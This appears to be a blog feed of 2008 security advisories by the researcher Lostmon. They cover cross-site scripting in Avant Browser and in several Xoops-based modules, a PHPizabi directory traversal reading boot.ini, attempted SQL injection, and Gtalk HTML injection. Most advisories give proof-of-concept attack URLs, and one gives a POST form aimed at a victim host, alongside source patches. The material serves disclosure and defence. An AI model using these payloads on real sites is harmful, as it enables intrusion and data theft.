notify:05-09-2008<br />Vendor response:---<br />Public Disclosure:----<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />Put in your Avant Broser<br /><br />about:"><script>alert(1)</script><br /><br />or create a link like<br /><br /><a href='about:"><script>alert(1)</script>'>Avant Browser XSS</a><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14508211404050386292008-08-28T04:33:00.009-07:002008-08-28T07:16:26.229-07:00Multiple browsers Fake files donwload Cross-site scriptingMultiple browsers are afected by a issue wen try to download<br />a fake file, this is a simple study of this situation , and <br />how to take profit. All Browsers have a little system for <br />download files, wen we click in a link,and this link go to<br />a downloable file, the browsers show a dialog to open ,save,<br />or cancel the download.<br /><br />Create a fake files with the follows extensions ,exe,com,jar,<br />bat,pdf,zip,rar,jpg,jpeg,gif,avi,wmv,wma,mpeg, and txt for <br />example...and inside write a javascript code like <br />"><script>alert(1)</script> and in the pdf file ,<br />write before script, the head for a pdf file %PDF- save al <br />files and create a html with links to fake files,for download it.<br /><br />Wen we click in some of this links, some browsers fails<br />to determine what file type it´s and wen the file is open,<br />the script is executed. I have test it in tree posible <br />scenarios or i test the security browsers in tree Zones,<br />with multiple browsers , but the most important are in<br />the table.<br /><center><a href="http://usuarios.lycos.es/reyfuss/browsers/tabla.jpg" target="_blank"><img src="http://usuarios.lycos.es/reyfuss/browsers/tabla.jpg" height="250" width="400"></a></center><br /><b> Click In the image to enlarge</B><br />The first test is local file (LF) this is wen we use protocol<br />file:// (ej: file://c:/test/index.html) and the script is runing<br />with the same rights that the users logged.<br /><br />The second test is in a intranet server (ID) it´s wen we visit<br />a page inside our intranet, and The script it´s running in the<br />context of security of intranet zone.<br /><br />The third test is in a internet server (RD) it´s when we visit<br />a page outside our intranet, and The script it´s running in the<br />context of security ofinternet zone .<br /><br />Affter test all, the most efective or secure browsers are ,<br />Mozilla Firefox and Flock browser, because they are non <br />afeccted by this issue in any zone, and the most insecure <br />is Avant browser and Maxthon Browser, because they are <br />vulnerables in the tree zones, this two browsers use explorer<br />modules, but explorer its vulnerable only in two zones.<br /><br />This issue can use to execute XSS style attacks.<br /><br />A malicious user can upload files to server or add downloads<br />to sites with the link to a fake file and wen a user try to <br />donwload it , if it navigate with a vulnerable browser in the<br />Zone, the script is executed with the rights of the affected Zone. <br /><br />a example with moore comprensive table is available here <a href="http://usuarios.lycos.es/reyfuss/browsers/" target="_blank"><b>POC</b></a><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br /><br /><br />http://usuarios.lycos.es/reyfuss/browsers/<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14445039220090165592008-08-25T13:57:00.002-07:002008-08-25T15:43:34.558-07:00PopnupBlog index.php multiple variables XSS##########################################<br />PopnupBlog index.php multiple variables XSS<br />Vendor url:http://www.bluemooninc.biz/<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />popnupblog-indexphp-multiple-variables.html<br />Vendor notify:no exploits availables:yes<br />##########################################<br /><br />PopnupBlog contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate 'param' , 'cat_id' and<br />'view' variables upon submission to 'index.php' script.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading loss ofintegrity.<br /><br />##########<br />versions <br />##########<br /><br />PopnupBlog 3.20 code name: Denali <br /><br />Prior versions can be vulnerables too.<br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time !!!<br /><br />But you can edit the source code and ix it like:<br /><br />for fix 'param' open index.php and arround line 37 we have<br /><br />[code]<br />$params = PopnupBlogUtils::getDateFromHttpParams();<br />$start = PopnupBlogUtils::getStartFromHttpParams();<br />$view = $BlogCNF['default_view'];<br />$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;<br />[/code]<br /><br />add a line to force 'param' to return a integer:<br /><br />[code]<br />$_GET['param'] = intval($_GET['param']);<br />$params = PopnupBlogUtils::getDateFromHttpParams();<br />$start = PopnupBlogUtils::getStartFromHttpParams();<br />$view = $BlogCNF['default_view'];<br />$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;<br />[/code]<br /><br />for fix 'cat_id' and 'view' open index.php and arround line 129 : <br /><br />[code]<br /> $xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email<br /> $cat_id=0;<br /> if (isset($_GET['cat_id'])) $cat_id = $_GET['cat_id'];<br /> if (isset($_POST['cat_id'])) $cat_id = $_POST['cat_id'];<br /> $xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));<br /> if (isset($_GET['view'])) $view = $_GET['view'];<br /> if (isset($_POST['view'])) $view = $_POST['view'];<br />[/code]<br /><br />add intval to force variables to return an integer like:<br /><br />[code]<br /> $xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email<br /> $cat_id=0;<br /> if (isset($_GET['cat_id'])) $cat_id = intval($_GET['cat_id']);<br /> if (isset($_POST['cat_id'])) $cat_id = intval($_POST['cat_id']);<br /> $xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));<br /> if (isset($_GET['view'])) $view = intval($_GET['view']);<br /> if (isset($_POST['view'])) $view = intval($_POST['view']);<br />[/code]<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/modules/popnupblog/index.php?param=1<br />">[XSS-CODE]&start=0,10&cat_id=&view=1<br /><br />http://localhost/modules/popnupblog/index.php?param=<br />&start=0,10&cat_id=">[XSS-CODE]&view=1<br /><br />http://localhost/modules/popnupblog/index.php?param=<br />&start=0,10&cat_id=&view=1">[XSS-CODE]<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-75185332961509173912008-08-15T10:00:00.001-07:002008-08-15T10:23:12.671-07:00PHPizabi v0.848b traversal file access##########################################<br />PHPizabi v0.848b traversal file access<br />Vendor url:http://www.phpizabi.net/<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />phpizabi-v0848b-traversal-file-access.html<br />Vendor notify:no exploit available:yes<br />##########################################<br /><br />############################<br />Description By vendor page:<br />############################<br /><br />PHPizabi is one of the most powerful social networking<br />platforms on the planet. With literally thousands of <br />websites powered by PHPizabi including everything from<br />simple friends sites to the most complex networking <br />super sites out there. Easy to install, use, and raising<br />the bar on what it is to provide a reliable, fast, social<br />networking package to raise your business to the next level.<br /><br />##########################<br />Vulnerability description<br />##########################<br />PHPizabi contains a flaw that allows a remote traversal<br />arbitrary folder enumeration.This flaw exists because the<br />application does not validate 'query' variable upon submission<br />to 'index.php' scripts wen 'L' param is set to 'blogs.search'.<br />This could allow a remote users to create a specially crafted<br />URL that would execute '../' directory traversal characters to<br />view folder files on the target system with the privileges<br />of the target web service.<br /><br /><br />#################<br />Versions<br />################·<br /><br />PHPizabi v0.848b C1 HFP3<br /> <br /><br />###################<br />Solution<br />###################<br /><br />At this moment ,no have solution for Traversal vuln.<br /><br />For solve XSS issue in search blogs update to sp3<br />of this system:<br /><br />Download sp3:<br />http://online.phpizabi.net/distribution/0848bC1_HFP3.zip<br /><br /><br />###################<br />Timeline<br />##################<br /><br />Dicovered:10-08-2008<br />vendor notify: 14-08-2008<br />Vendor response:<br />Public Disclosure:15-08-2008<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />XSS<br />#############<br /><br />if the sito don´t have instaled 848 Core HotFix Pack 3<br />(0848bC1_HFP3.zip) this system have one XSS hole in query<br />variable upon submision to index.php script wen L param is<br />set to blogs.search:<br /><br />http://localhost/phpizabi/index.php?L=blogs.search&query=<br />[XSS-CODE]boolean=or&sin%5B%5D=title&sin<br />%5B%5D=body&order=natural&direction=asc<br /><br /><br />#####################<br />Traversal file access<br />#####################<br /><br />For exploit this issue The attacker <br />need a Admin account.<br /><br />http://localhost/phpizabi/index.php?L=<br />admin.templates.edittemplate&id=../../../boot.ini<br /><br />we can too 'view' the html source code generated by<br />a remote server like :<br /><br />http://localhost/phpizabi/index.php?<br />L=admin.templates.edittemplate<br />&id=http://[Remote-HOST]/folder/file.php <br /><br />but i don't know if with this we can do something...<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-9808889924400344652008-08-11T05:25:00.002-07:002008-08-11T12:38:41.949-07:00FIX XSS in RMSOFT donwload plusfixing XSS issues in RMSOFT donwload plus<br /><br /><br />RMSOFT XSS Vulnerability<br />report:<br /> http://lostmon.blogspot.com/2008/08/rmsoft-downloads-plus-two-scripts-two.html<br /><br />###################<br />FIX $key variable <br />###################<br /><br />open modules/rmdp/include/rmdp_functions.php<br /><br />arround line 314 found function rmdp_make_searchnav()<br /><br />found this code:<br />#####################<br />[code]<br /><br />function rmdp_make_searchnav(){<br /> global $xoopsDB, $xoopsTpl, $xoopsModule;<br /> <br /> $xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));<br /> $xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);<br /> $key = isset($_POST['key']) ? $_POST['key'] : (isset($_GET['key']) ?($_GET['key'] : '');<br /><br /> $xoopsTpl->assign('key', $key);<br />[/code]<br /><br />the variable $key is vulnerable in GET & POST.<br />Now add htmlspecialchars() function:<br />change for this other:<br /><br />[code]<br />function rmdp_make_searchnav(){<br /> global $xoopsDB, $xoopsTpl, $xoopsModule;<br /> <br /> $xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));<br /> $xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);<br /> $key = isset($_POST['key']) ? htmlspecialchars($_POST['key']) : (isset($_GET['key']) ? htmlspecialchars($_GET['key']) : '');<br /><br /> $xoopsTpl->assign('key', $key);<br />[/code]<br /><br />now variable is clean in functions, but we need to sanitize again in search.php...<br /><br />open modules/rmdp/search.php <br /><br />arround line 37 we found two request to $key variable:<br />[code]<br />$rmdp_location = 'search';<br />include('header.php');<br />$key = $_GET['key'];<br />if ($key==''){ $key=$_POST['key']; }<br />$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);<br />[/code]<br /><br />need a cleaning :S use again htmlspecialchars() y GET & POST<br />change by this other:<br /><br />[code]$rmdp_location = 'search';<br />include('header.php');<br />$key = htmlspecialchars($_GET['key']);<br />if ($key==''){ $key=htmlspecialchars($_POST['key']); }<br />$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);<br />[/code]<br /><br />$cat aparently is sanitized , but if is a numeric value allways i ithink in use intval() like :<br /><br />[code]<br />$cat = isset($_GET['cat']) ? intval($_GET['cat']) : (isset($_POST['cat']) ? intval($_POST['cat']) : 0);<br />[/code]<br /><br />#############################<br />fix $id variable in down.php<br />#############################<br /><br />open modules/down.php and arround line 38 found this code line:<br /><br />[code]$id = $_GET['id'];[/code]<br /><br />it´s a numerical variable value always and them...<br />yo can change by this other to sanitizing :<br /><br />[code]$id = intval($_GET['id']);[/code]<br /><br />##############€nd ######<br /><br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-11428270467661880372008-08-10T19:55:00.001-07:002008-08-10T19:59:07.037-07:00Yogurt Social Network fans.php uid variable XSS##########################################<br />Yogurt Social Network fans.php uid variable XSS<br />Vendor url:http://sourceforge.net/project/<br />showfiles.php?group_id=204109<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />yogurt-social-network-fansphp-uid.html<br />Vendor notify:no exploits availables:yes<br />##########################################<br /><br /><br />Yogurt Social Network is a social network php/Mysql script<br />module for multiple CMS Systems like Xoops,e-xoops,bcoos and<br />impressCMS and probably in all CMS based in Xoops code.<br /><br />Yogurt Social Network contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate 'uid' variable upon <br />submission to Multiple scripts script in yogurt module.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading loss ofintegrity.<br /><br />##########<br />versions <br />##########<br /><br />Yogurt Social Network 3.2 rc1<br /><br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time !!!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/impresscms/htdocs/modules/yogurt/fans.php?<br />uid=1">[XSS-CODE]<br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-85679354727873803622008-08-09T12:34:00.002-07:002008-08-10T19:59:07.038-07:00RMSOFT Downloads Plus two scripts two variables XSS##########################################<br />RMSOFT Downloads Plus two scripts two variables XSS<br />Vendor url:http://www.xoops-mexico.net/<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />rmsoft-downloads-plus-two-scripts-two.html<br />Vendor notify:no exploits availables:yes<br />##########################################<br /><br /><br />RMSOFT Downloads Plus is a download php/Mysql script<br />module for multiple CMS Systems like Xoops,e-xoops,bcoos and<br />impressCMS and probably in all CMS based in Xoops code.<br /><br />RMSOFT Downloads Plus contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate 'key' variable upon <br />submission to search.php script and 'id' variable upon<br />submision to down.php script in module. This could allow<br />a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust <br />relationship between the browser and the server,<br />leading loss ofintegrity.<br /><br />##########<br />versions <br />##########<br /><br />RMSOFT Downloads Plus 1.5<br />RMSOFT Downloads Plus 1.7<br /><br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time !!!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/modules/rmdp/search.php?key=">[XSS-code]&cat=0<br /><br />http://localhost/modules/rmdp/down.php?id=1">[XSS-code]<br /><br />http://localhost/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1"><br />[XSS-code]&cid=3#users<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente..<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-24709367285937548892008-08-09T11:20:00.001-07:002008-08-10T19:59:07.039-07:00Yogurt Social Network multiple scripts uid variable XSS##########################################<br />Yogurt Social Network multiple scripts uid variable XSS<br />Vendor url:http://sourceforge.net/project/<br />showfiles.php?group_id=204109<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />yogurt-social-network-multiple-scripts.html<br />Vendor notify:no exploits availables:yes<br />##########################################<br /><br /><br />Yogurt Social Network is a social network php/Mysql script<br />module for multiple CMS Systems like Xoops,e-xoops,bcoos and<br />impressCMS and probably in all CMS based in Xoops code.<br /><br />Yogurt Social Network contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate 'uid' variable upon <br />submission to Multiple scripts script in yogurt module.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading loss ofintegrity.<br /><br />##########<br />versions <br />##########<br /><br />Yogurt Social Network 3.2 rc1<br /><br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />############<br />Solution<br />############<br /><br />No solution at this time !!!<br /><br />###########<br />Examples<br />###########<br /><br />http://localhost/impresscms/htdocs/modules/yogurt/friends.php?<br />uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/seutubo.php?<br />uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/album.php?<br />uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/scrapbook.php?<br />uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/index.php?<br />uid=1"><script>alert(1)</script><br /><br />http://localhost/impresscms/htdocs/modules/yogurt/<br />tribes.php?uid=1"><script>alert(1)</script><br /><br />Also the a autenticated user can compose a new scrap with XSS code <br />in description texarea, and it is executed wen a user looks the<br /> attacker malformed scrap.(stored XSS).<br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-51033604201434641002008-08-09T07:30:00.001-07:002008-08-10T19:59:07.039-07:00RMSOFT MiniShop module multiple variable XSS##########################################<br />RMSOFT MiniShop module multiple variable XSS<br />Vendor url:http://redmexico.com.mx<br />Advisore:http://lostmon.blogspot.com/2008/08<br />/rmsoft-minishop-module-multiple.html<br />Vendor notify:no exploit available:yes<br />##########################################<br /><br /><br />RMSOFT MiniShop is a E-commerce php/Mysql script module<br />for multiple CMS Systems like Xoops,e-xoops,bcoos and<br />impressCMS and probably in all CMS based in Xoops code.<br /><br /><br /><br /><br />RMSOFT MiniShop contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate multiple variable upon <br />submission to 'search.php' script in RMSOFT MiniShop module.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading loss ofintegrity.<br /><br /><br />#################<br />Versions<br />################·<br /><br />RMSOFT MiniShop 1.0<br /><br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />###################<br />Solution<br />###################<br /><br />At this moment ,no have solution...<br /><br /><br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />XSS<br />#############<br /><br />vulnerable code key & idc variables in lines 35 & 36 in search.php<br /><br />$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');<br />$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');<br /><br />to fix change to:<br /><br />$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');<br /><br />$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');<br /><br />vulnerable code itemsxpag variable in lines 56 to 67 in search.php :<br /><br />//NUmero de resultados por página<br />if (isset($_GET['itemsxpag'])){ <br />//setcookie('itemsxpag', $_GET['itemsxpag'], 86400);<br />$_SESSION['itemsxpag'] = $_GET['itemsxpag'];<br />$limit = $_GET['itemsxpag'];} else {<br />$limit = $_SESSION['itemsxpag'];<br />}if ($limit <= 0){<br />$limit = $xoopsModuleConfig['cols'] * 3;<br />$_SESSION['itemsxpag'] = $limit;}<br /><br /><br />exploit all tree variables:<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4<br />"><script>alert(1)</script>&Submit=Go%21&idc=0<br />"><script>alert(2)</script><br />&key="><script>alert(3)</script><br /><br />This is a persistent script insercion in 'itemsxpag' variable because the value<br />of the variable is inserted directly in '$_SESION' & '$Limit' variables.:<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?<br />itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=<br />&key=lalalalalala<br /><br />try to navigate to index and go again to minishop module<br />and try to search something in the search box of module.<br />Wen show the results the script executed before is<br />executed again.<br /><br /><br />#####################<br />Posible SQL Injection<br />#####################<br /><br />wen exploit in the example of script insercion<br />if we look web down we have a SQL Error:<br /><br />You have an error in your SQL syntax; check the manual<br /> that corresponds to your MySQL server version for the<br /> right syntax to use near '\">' at line 2<br /><br />we can try to inject some SQL code like <br />http://localhost/impresscms/htdocs/modules/rmms/search.php?<br />itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users<br />/**/LIMIT/**/1&idc=0&key=aaa<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?<br />itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1<br />&Submit=Go%21&idc=&key=aaaaaa<br /><br />and we get this error Incorrect usage of UNION and ORDER BY...<br /><br />we think in a classic SQL error , but i make several test with <br />union select and concat , etc etc and don´t have a working exploit<br />..them this is a unknow impact , and need to patch<br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-49569335853127913982008-08-06T10:47:00.002-07:002008-08-09T05:37:36.271-07:00Kshop module search variable and field remote XSS##########################################<br />Kshop module search variable&field remote XSS<br />Vendor url:http://www.kaotik.biz/<br />Advisore:http://lostmon.blogspot.com/2008/08/<br />kshop-module-search-variable-and-field.html<br />Vendor notify:no exploit available:YES<br />##########################################<br /><br /><br />Kshop is a E-commerce php/Mysql script module for<br />multiple CMS Systems like Xoops,e-xoops,bcoos and<br />impressCMS and probably in all CMS based in Xoops code.<br /><br />Kshop contains a flaw that allows a remote cross site <br />scripting attack.This flaw exists because the<br />application does not validate 'Search' variable and<br />search form field include in this module upon <br />submission to 'kshop_search.php' script in Kshop module.<br />This could allow a user to create a specially crafted form<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading loss of integrity.<br /><br /><br />#################<br />Versions<br />################·<br /><br />Kshop module 2.22<br /><br />i make a test with ImpressCMS<br />and this CMS in kshop module <br />have version 2.23 ????<br /> <br /><br />it´s posible that prior versions <br />are affected too.<br /><br />it affects This type CMS Systems if we<br />have instaled this module:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and other that uses xoops code and this module.<br /><br />###################<br />Solution<br />###################<br /><br />At this moment ,no have solution...<br /><br />but you can make a simple patch ,open kshop_search.php<br />inside kshop module folder arround line 45 you have<br />[code]<br /><br />$xoopsTpl->assign('searchTerm',$_POST['search']);<br /><br />you can use strip_tags() PHP function , like:<br /><br />$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));<br /><br />now it´s patched , because this remove all tags in the search variable.<br /><br />or you can use htmlentities() PHP function for patch much more clean like :<br /><br />$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));<br /><br />or ,much moore restrictive:<br /><br />$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));<br /><br />[/code]<br /><br />Happy patch !!!<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />This Issue could not exploit directly by URL<br />because the form field have a limitation of 20 chars<br />and we need a POST to exploit ,for that we can´t exploit <br />directly by url because it is a GET and we need a POST. <br /><br />This is not a problem, we can make a form with the POST <br />and without any restriction in the form field for Exploit it<br /><br />put some javascript or html code in the form field<br /><br /><p>Example: "><script>alert()</script><br /><br /> its necesary that you put "> before the code.</p><br /><p><form action="http://[victim]/modules/kshop/kshop_search.php" method="POST"><br /><br /> <input type="text" name="search" value="Put your XSS Here !!!"><br /><br /> <input type="image" src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form></p><br /><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-45697892876173955162008-06-25T10:27:00.005-07:002008-07-12T06:49:23.674-07:00Gtalk 1.0.0.105 html injection and Stealing messages############################################<br />Gtalk 1.0.0.105 html injection and Stealing messages<br />Vendor url:http://www.google.com<br />Advisore:http://lostmon.blogspot.com/2008/06/<br />gtalk-100105-html-injection-and.html<br />Vendor notify:yes exploit available:yes<br />############################################<br /><Blockquote><h4>This post was Updated on 12-07-2008</h4><br><br><br />Aparently this flaw now is fixed for exploit remote, but it <br />continue still vulnerable in a local mode example<br /><br />before patch if a attacker send to victim mailto: "><h1>Lostmon</h1> <br />it is executed in the victims gtalk 1.0.0.105<br /><br />affter the patch the server converts mailto:"><h1>Lostmon</h1> in<br />mailto: h1 Lostmon /h1 (very good )<br /><br />but if the victims send to attacker the code, it continue<br />executing in the victim's machine , then ... the posible<br />exploit of this issue for remote users are pached !!!!! Good work ,<br /><br />It continue vulnerable at local exploit. :|<br /></blockquote><br /><br />GTalk is a service offered by Google instant messaging. <br />It allows communication via 